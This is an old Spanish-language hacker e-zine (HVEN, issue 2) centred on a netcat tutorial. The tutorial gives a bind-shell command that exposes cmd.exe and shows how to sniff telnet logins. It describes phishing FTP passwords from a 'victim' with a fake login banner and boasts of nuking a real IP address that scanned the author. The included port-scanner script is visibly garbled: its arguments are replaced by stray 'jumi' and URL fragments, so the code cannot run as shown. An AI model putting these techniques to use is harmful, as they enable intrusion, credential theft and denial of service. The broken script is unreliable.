����������������������������ͻ  
�����������������������͹  ���� HVen  E-Zine ۲��  �����������������������ͻ
�                       ����������������������������ͼ                       �   
�                                                                            �   
�                            �  �  � �  ���  ����                            �
�                            ����  � �  ���   � �                            �
�                            �  �  ���  ���   � �                            �
�                                                                            �
�                                 ~~0  |_)                                   �
�                                |(_~|^~~|                                   �
�                                 TT/_ T"T                                   �
�                             ^^^^^^^^^^^^^^^^^                              �
�                        El Primer E-Zine Venezolano                         �   
����������������������������������������������������������������������������͹    
�����������������������������͹  Disclaimer  �����������������������������͹ 
� El contenido de esta revista electr�nica tiene una �nica finalidad,  la de �   
� educar con respecto a  seguridad  inform�tica y que  posibildades  tenemos �   
� para quebrar dicha seguridad, as� como tambi�n   mencionamos  otros temas, �
� especialmente referentes al underground, ni el equipo  ni  ninguno de  sus �
� colaboradores se hace responsable de  lo que tu hagas con esta informaci�n �
� desde ahora solo tu eres responsable de tus actos...                       �
����������������������������������������������������������������������������ͼ
����������������������͹  Powered by Edit del DOS  �����������������������͹  

                              P�gina Oficial
                ������>>  http://www.hven.com.ve  <<������

                             
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

                               Canal Oficial
            ������>>  #Hackers-Venezuela (irc.dal.net)  <<������
                          El Conocimiento es Poder

                       ������>> Ezine Staff  <<������

            DarKdEaTH                            
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DoctorX                              
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DunkelSeite                          
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Kliber                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Merlin                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Supreme                              
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Teken Melocotoff                     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

                    ������>>  Colaboradores  <<������

            TecData                              
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Sick Boy                             
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            TiTO_C                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

   �����������ͻ
��͹ Contenido ���������������������������������������������������������������
   �����������ͼ

01  Editorial                                           DarKdEaTH

02  Netcat                                              Kliber

03  De todo un Poco                                     DarKdEaTH

04  Sistemas Operativos 100% seguros                    Teken Melocotoff

05  Compilando el Kernel                                DoctorX

06  Tips para la instalaci�n de NT                      Dunkelseite - Merlin

07  Estructura de Archivos y directorios en Linux       Supreme - Merlin

08  Conectando desde Linux a Internet                   SickBoy

09  Wingates                                            Supreme

10  Como Obtener Op en Canales Registrados De IRC       TecDATA

11  Firewalls en Linux                                  DoctorX

12  Mini How to de Firewalls en Win Nt/95/98            Merlin

13  Denial of Service attack contra modems              TiTO_C

14  Bounce Attack                                       Teken Melocotoff

15  Programaci�n en Linux                               DoctorX

17  HVEN RC5 DES                                        HVEN

16  Llave PGP                                           HVEN

18  Despedida                                           DarKdEaTH

   �����������ͻ
��͹ Editorial ����������������������������������������������͹DarKdEaTH������
   �����������ͼ

  Despu�s de tanto esperar aqu� est� nuestro segundo n�mero, creo que nos
  hemos tardado un poco m�s de la cuenta en sacar este n�mero pero  hemos
  tenido  algunos problemas con el editor, hemos tenido 2 editores adem�s
  mi, los cuales  tuvieron  problemas  para  terminar el trabajo pero ac�
  estamos luchando contra las adversidades =)

  Muchos  han  sido los  correos que  hemos  recibido  felicit�ndonos por
  nuestro trabajo, lo que nos halaga y nos estimula para  seguir haciendo
  lo que nos gusta sin importar los problemas que se nos presenten.

  Les  recordamos  a  los que han  intentado  entrar en  nuestra lista de
  correo y no han recibido respuesta, que cada solicitud es estudiada por
  los miembros y luego se toma una decisi�n, no rechazamos a nadie por no
  tener  conocimientos  de hack, sino a  los  que  escriben diciendo  que
  quieren joder a un enemigo o algo as�, ya vamos a madurar y evitar esos
  problemas, por  eso es que vemos tantos piques en la scene under,  esto
  lo menciono pq algunos  individuos no  entraron a la lista y decidieron
  que la mejor reacci�n era entrar al  canal a nukear, malo malo.. aunque
  en  estos  momentos la  lista no  se est� moderando  como antes as� que
  seguro no es muy dificil entrar.

  Mucho se habla sobre las ansiadas tarifas planas en Venezuela, hmmm ver
  para  creer, aunque pronto se acabar� el monopolio de CANTV todav�a  no
  hay  que  hacerse  muchas  ilusiones  con  eso  de  las tarifas planas,
  mientras  tanto hay que seguir calandonos el abuso de CANTV =(, una muy
  buena opci�n es conectarse a internet  por medio de cable  modem, bueno
  ya dejo de marearlos con  tanta paja y vamos a lo que nos  intereza, el
  ezine que est� bastante decente ;).


   ����������������������������������������������������ͻ
��͹ Netcat. Sacandole Provecho a una exelente Utilidad ��������͹Kliber������
   ����������������������������������������������������ͼ

  Netcat  es un  peque�o programa creado para uso de los Administradores
  de redes (y por supuesto para los Hackers) :), este proggie fue creado
  originalmente  por  Hobbit  y  porteado a Win95 y NT por Weld Pond  de
  L0pht, tiene  mas de  un a�o desde que fu� Liberado y muy poco  se  ha
  escrito sobre este Programita; Principalmente porque la estructura  de
  sus  comandos  es  poco familiar para el usuario medio.  Netcat  tiene
  infinidad  de  funciones, aunque se deja que sea el usuario quien  las
  averig�e :P, y  en el  archivo de  ayuda  ponen algunos ejemplitos muy 
  elementales solamente...

  La especialidad de Netcat es el Protocolo TCP/IP, y le da a la m�quina
  de windows,  cierto  poder  sobre  este protocolo que solo ten�a UNIX,
  trabaja  con  l�neas de  comandos desde  MS-DOS (o desde  el Shell  de
  Linux), y seg�n parece, puede hacer casi cualquier cosa sobre  TCP/IP.
  El comando principal es nc con su respectiva variable u opci�n al  m�s
  puro estilo Unix.


  Cabe  destacar que la informaci�n sobre Netcat y sus usos  espec�ficos
  es  bastante  limitada; aunque  Hobbit  en  su documento aclara muchas
  cosas,  cita  algunos  ejemplos  y dice que NetCat puede ser utilizado
  para mas de 1001 vainas...

  Netcat puede ser encontrado en: http://www.l0pht.com/~weld/netcat

	Netcat en WinX
	==============
	
  Este  es el  resultado del comando de ayuda de netcat en  una  m�quina
  windows

 c:>nc -h

connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

  Bien;  un  an�lisis  r�pido  de estas variables nos  da  una idea  del
  potencial  de  este peque�o programa y las infinitas posibilidades que
  nos ofrece �l  poder  manejar  conexiones de  una manera  tan b�sica y
  sencilla:

<------ Opciones de Netcat --------->

-d  (Modo Stealth o encubierto) 

  Esta opci�n desvincula al Programa de la consola, haci�ndolo  trabajar
  en el BackGround.

-e  (Ejecuta un programa cuando se conecta) 

  Puede ser utilizado para ejecutar incluso un Shell tanto en WinX  como
  en *NIX.

-l  (Escuchando conexiones) 

  Deja a un puerto abierto en espera de una conexi�n

-L  (lo mismo que anteriormente pero sigue escuchando a�n cuando la
  conexi�n es cerrada)

  Esta opci�n es incluida en la versi�n de Weld Pond de L0pth, y es  muy
  �til para seguir escuchando en el puerto, a diferencia de -l  (que  la
  conexi�n cerrada termina con el proceso de nc) esta  opci�n -L permite
  seguir   escuchando  en  el  mismo  puerto  (la  rutina  de  nc -l  es
  reincidida).

-n   (Direcci�n num�rica especifica; no hace un DNS Lookup) Netcat tiene
  la facultad de resolver nombres de dominio mediante un DNS Lookup, con
  esta  opci�n  le  especificamos  que  no  lo  haga,  y  use  solamente
  direcciones IP.

-o  (obtiene  un archivo log en Hex de la acci�n) Genera un Log
  de las actividades de netcat en c�digo Hexadecimal.

-p (Puerto para pegarse) Algunas veces debes  especificarle  con
  esta opci�n el puerto a realizar una acci�n.

-s  (pegarse a un IP especifico) Netcat  puede  utilizar IP  de
  una red como fuente local.

-t   (Funciona como un  peque�o  demonio  telnet)  Con  esta  opci�n  le
  especificas a netcat que debe realizar negociaciones telnet.

-u  specify UDP (Utilizar Protocolo UDP)  Con  esta opci�n  le  dices  a
  netcat que trabaje con protocolo UDP en vez de TCP.

-v   (modo verbose, mas informaci�n, se le puede a�adir otra -v para mas
  info todav�a)  Bastante  �til y necesario,  sobre  todo  para estudiar
  demonios en profundidad y observar todos los detalles en un Sniffing.

-w  (Especifica  un  tiempo  para terminar) Con esta opci�n le
  especificas un tiempo determinado para realizar conexiones.

-r (Genera un Patr�n Ramdom de puertos locales o remotos) Muy �til  para
evitar patrones l�gicos de Scanning.

-g  (especificar Gateways) Una de las opciones m�s interesantes
  de netcat, permite utilizar Routers como "puentes" de conexi�n.

-G  (Especificar puntos de  Routing), Con  esta  opci�n  podemos
  crear una cadena aleatoria de hosts para crear una ruta  perdida  para
  tus paquetes (Spoofing).
 
-i   Especifica  un  intervalo   de  segundos   entre  puertos
  Scaneados.

<------------- Fin de las opciones comentadas ------> 


	Netcat en Linux
	===============

  Netcat en una plataforma como Linux se convierte en una  utilidad  muy
  potente,   pudiendo   ser  utilizado  en  conjunto  con  lenguajes  de
  programaci�n como Perl y C , o bien  desde la propia L�nea de comandos
  del poderoso Shell de Linux mediante Shell Scripts.

  Cabe destacar que distribuciones como RedHat Linux trae junto  con sus
  paquetes  de  instalaci�n  una  versi�n  limitada  de  netcat;  lo m�s
  recomendable es bajar de la red la versi�n  full de netcat para  Linux
  (Importante: La versi�n de netcat para linux viene a prueba de lamers,
  por lo cual debemos compilar a netcat con unos flags  especiales  para
  poder  obtener  las opciones -t y -e (Telnet y Gaping Security Hole)).
  Bajas el .tar de  netcat y  lo  desempaquetas  en el directorio  de tu
  preferencia, te ubicas dentro del directorio  de netcat y lo  compilas
  con Make utilizando las siguientes Flags:

[root@DarkStar] #make linux DFLAGS=" -DTELNET -DGAPING_SECURITY_HOLE"

  Copias el binario (nc) al directorio /usr/bin , de esta manera  podr�s
  usar netcat directamente  llam�ndolo  de  cualquier  parte  del Shell,
  adem�s de que podr�s usar los scripts que hagas (o consigas en la red)
  sin  problemas;  netcat  trae  unos  scripts  muy  interesantes y bien
  comentados para que los estudies y comprendas mejor su  implementaci�n
  en scripts, los scripts est�n en el directorio donde  desempaquetastes
  netcat en /scripts , los  corres  como siempre: ./probe  (o  el script
  que quieras).


        Utilizando Netcat
        =================

  Para  ilustrar  mejor  como trabajamos con este programa, lo mejor  es
  observar  ejemplos  pr�cticos  y  analizar  su  estructura  para poder
  comprender  mejor como funciona y  as� poder  crear  nuestras  propias
  aplicaciones.

  Algunas de las cosas que podemos hacer con NetCat son:

  Obtener un Shell r�pidamente en una m�quina remota usando la opci�n -l
  (Listen) conjuntamente con la opci�n -e (ejecutar), cuando el proggie
  corre  con estas variables y la conexi�n es realizada, NetCat  ejecuta
  el programa elegido y se conecta a stdin y stdout del programa  en  la
  conexi�n a la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

  Este comando dejar� a NetCat escuchando el Puerto 23 (telnet),  cuando
  es  conectado  a  trav�s  del cliente, ejecutar� un Shell (cmd.exe) la
  opci�n -t le  dice  a  NetCat  que maneje cualquier negociaci�n que el
  cliente pueda esperar....

  Si esta conexi�n  es realizada desde una m�quina NT, el shell  correr�
  los  permisos  del proceso que han generado a NetCat (Hmmm...) as� que
  hay que ser muy cuidadosos :)

  La belleza de NetCat es que puede hacer  lo mismo en CUALQUIER  puerto
  :) Puedes dejar a NetCat escuchando en los puertos NETBIOS, que  est�n
  probablemente  corriendo  en  la  mayor�a  de las m�quinas NT, de esta
  manera  puedes  lograr  una conexi�n a una m�quina que est� utilizando
  "Filtrado de Puertos"  activado  en  TCP/IP  security  Network Control
  Panel, NT  no  parece  tener  ninguna  seguridad  alrededor  de cuales
  puertos  los programas de usuarios son permitidos amarrar, esto quiere
  decir en pocas palabras, ejecutar  comandos  y  programas  que  puedan
  unirse a los Puertos NETBIOS.


  Como anteriormente se mencion�, puedes utilizar a Netcat para estudiar
  diferentes puertos, con la siguiente sintaxis:

c:\>nc -v   (puedes a�adir otra -v)


  Uno de los puertos m�s interesantes a la Hora de Analizar un Host,  es
  el  puerto  79  (Finger),  puedes  obtener  nombres  de   usuarios   e
  informaci�n  muy  �til  a  la hora de planear un "Brute-Force Attack",
  este comandito  de  Netcat  te  muestra la Flexibilidad del Proggie en
  cuesti�n, d�ndote una idea de sus posibilidades:

c:\>nc -v  79 < user.txt > log.txt

  El comando anterior le dice a netcat que se conecte en modo verbose al
  Host predeterminado en el puerto 79 (Finger) y env�e el contenido  del
  archivo  user.txt  (OJO:  no  he probado esto con una posible lista de
  nombre de usuarios al azahar), la respuesta del servicio ser� guardada
  en el archivo log.txt


	Scanner:
	========

  Netcat  puede  ser  utilizado como scanner, sus m�ltiples opciones  le
  permiten realizar un gran n�mero de combinaciones,  pudiendo  realizar
  Scannings en Puertos Random, en puertos conocidos, en modo  ascendente
  o descendente,  con  intervalos  de  tiempo,  utilizando gateways para
  evitar mostrar la IP fuente del Scanning, etc. 

 C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

  Pues si; aqui tienen  un  peque�o y  primitivo scanner, se  le  pueden
  a�adir  puertos  escogidos  como en el ejemplo anterior o asignarle un
  rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused  etc...

  Volvemos con la opci�n -v (verbose) y la Opci�n -z (zero i/o)  que  es
  usada  para scanning, los puertos se lo especificamos al final del  IP
  del host, bien  sea individuales separados por un  espacio; o  por  un
  rango de puertos.
      

	Sniffer:
	========

  Otra  de  las interesante posibilidades de netcat es su capacidad para
  escuchar  conexiones en cualquier puerto, pudiendo redireccionar  todo
  el tr�fico  del  mismo  hacia  un  archivo  o  hacia pantalla, en este
  sencillo ejemplo, podemos observar las bases de un sencillo sniffer en
  Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui... Muuuaaahahahahahah!!! B-]


  Tambi�n  podemos  redireccionar  toda la salida a un archivo e irnos a
  realizar otras actividades ,mientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...

[Aqui viene la conexi�n...]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la conexi�n se va al archivo login.txt]
 sent 0, rcvd 42

[La opci�n -L permite que netcat escuche nuevamente al terminar la
conexi�n,"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 ...


         El Exploit-Explained nc -v -v -L 127.0.0.1 -p 23
         --------------------

  Ejecutamos a Netcat con la opci�n o variable -v (verbose)  (doblemente
  "verbose"  por si acaso) ;) esto har� que el resultado de netcat,  sea
  mostrado  directamente en pantalla (a diferencia del archivo usado por
  Dr._X),  la  opci�n  o  variable -L  (Listen,  and  listen  again) nos
  permitir�  dejar  escuchando  u  "oliendo"  en  determinado puerto aun
  cuando la conexi�n sea interrumpida (listen again), con la variable -p
  le indicamos el puerto...

  Al ejecutar a netcat con esa combinaci�n de variables las opci�n -v me
  indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...


  Realizo  desde  otra  ventana  un telnet a localhost (127.0.0.1) en el
  puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado


         Voil�! un Sniffer en LocalHost!  Jajaja!!!


        Detector de Conexiones Sospechosas
        ==================================

  La  posibilidad de dejar a netcat escuchando en determinados  puertos,
  nos permite crear una especie de "trampa" para un supuesto agresor que
  utilice scanners, o  herramientas  tales  como NetBus o BackOrifice en
  contra de  nuestras  estaciones. Incluso, podemos crear un archivo que
  haga un Flood y redireccionar su salida hacia la estaci�n agresora  en
  caso de una conexi�n no  autorizada a  determinado puerto. (jeje! y se
  me ocurren un mont�n de cosas m�s, Muaahahaha!)  :)

  Este  es  un ejemplo de un detector de BO, Je! y funciona! este es  un
  ejemplo real de un d�a como cualquier otro en IRC; he aqu� el ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 ...

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
 31338

  Back Orifice  utiliza  el  protocolo UDP para realizar sus travesuras,
  realiza  la conexi�n desde un puerto aleatorio (casi siempre  el 1080)
  aunque en este caso lo hizo desde el 31338 (posiblemente una  variante
  de BO),  por  eso se utiliza la opci�n -u (protocolo udp),  netcat  se
  queda  esperando  conexiones  UDP  en el puerto 31337 (default de BO),
  cuando  alguien  hace  un  sweep  a tu IP netcat lo detecta enviando a
  pantalla el IP y el DNS del agresor...

  Luego un peque�o "Ping of Death" (Nuke) para el transgresor y le hacen
  un Scan para ver cuando desaparece B-]

nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<--Chao!!! Jeje!!


        Otros usos Miscel�neos
        ======================

  Puedes  utilizar  algo  de  ingenier�a  social para  capturar  algunos
  passwords con netcat, por ejemplo, si una m�quina no tiene abierto  el
  puerto  de  FTP o de telnet, creas un archivo de texto que solicite el
  ID y el Password de la v�ctima; algo as�:

Microsoft Internet FTP Server V.5.9 [Beta]
04/16/99 myhost.com
Please introduce Username, password and press "Enter"
LogOn:

  Luego redireccionas el archivo hacia la v�ctima:

C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt

  Si  el  tonto  cae... Ah�  va  tu  password,  Jeje!! B-]  un  poco  de
  imaginaci�n  y  ma�a  te  permitir�n  encontrar muchas utilidades para
  netcat.


        Netcat en Vez de Telnet
	=======================

  Yo personalmente prefiero usar netcat para realizar conexiones remotas
  como  alternativa  al Telnet. la ventaja de realizar conexiones telnet
  desde netcat es que este esconde "algo" sobre tu conexi�n, lo  que  lo
  hace mas "sigiloso" que telnet, (de ah� por  qu� lo  llamaron netcat),
  Realizando una conexi�n "Limpia" en determinado puerto,  obviando  las
  negociaciones comunes  de  Telnet  que  pueden confundir al cliente en
  determinados casos, como por ejemplo, al  utilizar  ciertas  Backdoors
  muy conocidas en Unix.

  OJO:  algunas  m�quinas interpretan al cliente de telnet y  asumen  el
  nombre  del  usuario  que  lo  utiliza,  de  all�  el  porqu�  algunos
  servidores solo preguntan por password ; te�ricamente netcat  no env�a
  esta  informaci�n.  Por eso,  es recomendable acostumbrarse a utilizar
  netcat para hacer conexiones remotas:

 
	c:> nc -v nombre del host 23(o el puerto de tu preferencia)


        Netcat y Programaci�n
        =====================

  Esta  combinaci�n  desencadena  todo  el Poder de Netcat en su  m�xima
  expresi�n; Trat�ndose  de una  herramienta  que funciona con l�neas de
  comandos, su integraci�n  con un  lenguaje de  programaci�n le permite
  realizar gran cantidad de tareas, y posibilidades se van  descubriendo
  d�a a d�a con su inclusi�n en nuevos Scripts y Exploits. 

  Muchos  ScriptKiddies  que  no tienen idea de lo que hacen, se sienten
  frustrados porque muchos de los Scripts y Exploits que bajan de la Red 
  simplemente no les  funciona, porque no saben  interpretar el C�digo y
  por lo  tanto son  incapaces de efectuar las modificaciones necesarias
  para   incluir  librer�as,  paths  o  utilidades  necesarias  para  su
  funcionamiento. (J�danse ScriptKiddies!!! Jajaja!!)

  Netcat  es  excelente  para  implementar exploits remotos, permitiendo
  enviar el c�digo a cualquier  puerto vulnerable con una  simple orden,
  logrando  ejecutar   todos  los  comandos   necesarios  para  explotar
  determinados servicios.

  Varios exploits que circulan actualmente en la Red, usan a netcat como
  "motor" para  manejar las conexiones, si analizamos el c�digo de estos
  programas  podemos  observar  un  nc  por  ah�, esto  significa que el
  Proggie en cuesti�n necesita una versi�n  correctamente  compilada  de
  netcat en el directorio  /usr/bin . A continuaci�n un peque�o programa
  realizado por el Doctor_X de Hven utilizando a netcat:

<---------- Hven Port Scanner!! ------>

# !/bin/bash
# Scanner de Puertos 
# By DoctorX 17/04/99  email: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
# Zona de Bacterias  http://bactery.8m.com
# Hackers de Venezuela http://www.hven.com.ve
# Este es un shell script hecho por mi para la verificaci�n de 
# conexiones a un host utilizando netcat.

# Declaraci�n de Variables

export NETCAT=" nc -v -v -w 8 -z "
export RANGO=[*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
LOCALHOST=$(uname -n)
export PUERTOS="21 23 25 79 80 110 111 113 139 143 513 514 515 6000 31337"
export MEM1="Scanner de Puertos "
export MEM2="by "   
export MEM22="para Hackers Venezuela"
export MEM3="Victima : " 
export MEM4="Falta el GateWay para el Source Routing !!!!!!"
export MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
export MEM6="Local Host : $LOCALHOST " 
export MEM7="UDP Scan "
export MEM8="http://www.hackhour.com.br/hven"
export re=" [5m"
export cl=" [0m"
export rojo=" [31m"
export email="email:
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 "

# Declaraci�n de Funciones

# Mensaje cuando no se le dan Par�metros

function mem() {
local uso="uso  :{jumi [*3] [http://www.govannom.org/e-zines/hven/hven002.txt]}  [opcion]   "
local DRX="DoctorX"
echo $MEM1 
echo $MEM2   ${rojo}$DRX${cl}  $MEM22
echo $MEM8
echo ${rojo}$uso${cl} 
echo "             :IP/HOSTNAME de La Victima jejejeje "
echo "          :source-routing , es opcional " 
echo "opciones : "
echo "u                  :esta opcion de utiliza para hacer scan udp"
echo "so                 :Determinacion de SO de servidores Web" 
echo "r rango_de_puertos :Cambia el rango de puertos por defecto :plow-phi" &&
exit ; }

# Mensaje Inicial

function mem2() {
VICTIMA=jumi
echo $MEM1
echo $MEM2 ${rojo}DoctorX${cl} $MEM22
echo $MEM3  $VICTIMA
echo $MEM6 ; }

# Mensaje 2

function mem_web() {
mem_web1="Hackers Venezuela"
mem_web2="By"
mem_web3="Victima : "
VICTIMA=jumi
mem_web4="Determinacion de SO en Web Servers"
echo $mem_web1
echo $mem_web4
echo $mem_web2 ${rojo}DoctorX${cl} $email 
echo $mem_web3 $VICTIMA ;}


# Scan Tcp

function tcp() {
 HOST=jumi
 $NETCAT  $HOST $PUERTOS ; }

# Scan Tcp con Rango

function tcp_rango() {
 HOST=[*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
 RANGO=jumi
 $NETCAT  $HOST $RANGO ; }

# Scan UDP

function udp() {  
VICTIMA=jumi
echo $MEM7 
$NETCAT  -u $VICTIMA $PUERTOS ; }

# Scan UDP con gateway

function udp_gateway() {
echo $MEM7
VICTIMA=[*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
GATE=jumi
NETCAT_GATE="nc -v -v -z -u $VICTIMA -g $GATE " 
$NETCAT_GATE $PUERTOS ; }

# Scan con Source Routing
 
function tcp_gateway() {
GATE=jumi
HOST=[*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
RANGO=$PUERTOS
echo "Gate : $GATE "  
$NETCAT -g $GATE  $HOST $RANGO ; }

# Advertencia

function  adv() {
local MEM4="Falta el GateWay para el Source Routing !!!!!!"
local MEM5="Te van a pillar !!!!!!! $USER jejejejeje "
echo ${rojo}$MEM4${cl} 
echo ${re}${rojo}$MEM5${cl}  ; }

# Determinaci�n de SO

function web_so() {
NC="nc -w "
HTTPPORT="80"
GET="GET /"
ECHO="/bin/echo"
HEAD="HEAD / HTPP/1.0"
HTTPVARIABLE="Server:"
WEB_SERVER="jumi"
LOG="salida.txt"
#CHECKHTTP=( echo $GET  ; sleep 5)| $NETCAT $VICTIMA  80 
( echo $HEAD  ; echo ; echo ) | $NC  8 $WEB_SERVER $HTTPPORT | grep 
$HTTPVARIABLE  | cut -d: -f2  1> $LOG  
cat  $LOG
rm -f $LOG  ;}


# Seleccion de Opcion

case $# in 0 ) mem ;; 
           1 ) mem2 jumi ;
               adv  ;
               tcp jumi ;;
           3 ) if [ "jumi" != "r" ]; then 
                  mem2 [*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
                  udp_gateway  [*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
               else {  mem2 
                     adv  
                     tcp_rango [*3] [http://www.govannom.org/e-zines/hven/hven002.txt]  ;} 
               fi ;;
           2 ) if [ "jumi" != "u" ] ; then
                       if [ "jumi" != "so" ] ; then
                             {  mem2 jumi
                             # adv  
                             tcp_gateway [*3] [http://www.govannom.org/e-zines/hven/hven002.txt] jumi ;} 
                       else { mem_web [*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
                              web_so [*3] [http://www.govannom.org/e-zines/hven/hven002.txt] ;} 
                       fi
                else  { export HOST=[*3] [http://www.govannom.org/e-zines/hven/hven002.txt]
                       mem2 $HOST 
                       udp [*3] [http://www.govannom.org/e-zines/hven/hven002.txt]   
                       exit 0 ;}
                fi ;           
esac

 
<------- Fin del Hven-Scanner, cortar aqu� --------->

        Conclusi�n
        ==========
	 
  Si  estudiamos  detalladamente  las  variables, el  misterio de netcat
  desaparece, viene la parte de la imaginaci�n; �Que otras funciones  le
  podemos asignar? �Que mas podr�a hacer? ; al revisar el  programa  que
  envi� Dr._X me dije: "L�gico! Hmmm... Y que tal si hacemos as�..."; el
  hacking  no  es  m�s  que probar  nuevas  posibilidades, utilizando el
  ingenio, los  conocimientos  acumulados y una dosis bastante fuerte de
  imaginaci�n podremos lograr lo que queramos.  :)


  Si tienes  otras ideas, utilidades, programas o forma innovadora  para
  utilizar  netcat, escr�benos un  mail, estar� encantado de anexarlo en
  este documento....

  Este Documento fu� Realizado por Kliber, Agradecimientos especiales  a
  Doctor_X (Code Freak) :), DarKdEaTH, y a todos los miembros de nuestra
  comunidad por su invaluable Colaboraci�n.

	"Hecho en Venezuela!"

==============================
   
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
   Hackers Venezuela
   "El Conocimiento es Poder!!"
   http://hven.com.ve
============================== 	
   �����������������ͻ
��͹ De todo un Poco ����������������������������������������͹DarKdEaTH������
   �����������������ͼ

  Estamos cumpliendo un a�o desde que se form� HVEN, aunque mucho  antes
  ya Kliber hab�a  fundado Hackers Venezuela, en geocities, uff,  cuando
  este no era tan  mierda, pero en  realidad  cuando  se  form�  nuestro
  equipo fu� m�s o menos en noviembre del 98, desde ah� dejamos  de  ser
  unos  chamos  que  se  conectaban  mucho  a  internet  para  ser  unos
  investigadores de internet, uff eso suena extra�o, no? bueno  pero as�
  fu� :), ahora tenemos unas bajas temporales por diversas razones, pero
  algunas veces coincide  una, CANTV!!! me anoto en la lista, y es que a
  esta gente no les importa el  retraso del pa�s, ya  que mientras menos
  nos  conectemos  a internet  menos  podremos seguir en lo nuestro pero
  aunque llueva truene y relampaguee aqui seguiremos.

        Pitcher Bolivariano

  Dicen por ah� que van a destinar parte del  presupuesto del  pa�s para
  construir un estadio de beisbol en el Palacio de  Miraflores para  que
  pueda jugar nuestro "presidente" (o mejor conocido como el  presidente
  peregrino) cuando venga al pa�s, y es que Ch�vez en vez de  encargarse
  de la situaci�n del pa�s lo que  hace es  viajar por el  mundo y jugar
  beisbol, como hace unos d�as en Cuba, que  por cierto.. le dieron palo
  y palo, como pitcher es buen militar :-P, resulta que ahora  en vez de
  llamarnos  Rep�blica  de  Venezuela, ahora por un  arranque de  Ch�vez
  pasaremos  a  ser  Rep�blica  Bolivariana  de  Venezuela, como  si eso
  contribuyera  de  alguna  forma  a  mejorar  la situaci�n del pa�s, la
  palabra Bolivar no  arreglar� las cosas  m�gicamente, ademas de que le
  traer�a un gasto importante al pa�s el  cambio del nombre en todos los
  documentos y ojal� solo fuera eso, pq tambi�n  aprobaron seis  a�os de
  mandato para el presidente con  posibilidad de reelecci�n, y para  m�s
  "�apa"  quiere que solo haya  una pregunta en el referendo  consultivo
  del 15 de  Diciembre, o todo o  nada, por  lo  menos  yo, se que voy a
  responder.. y tu??


        Ultimos Hacks

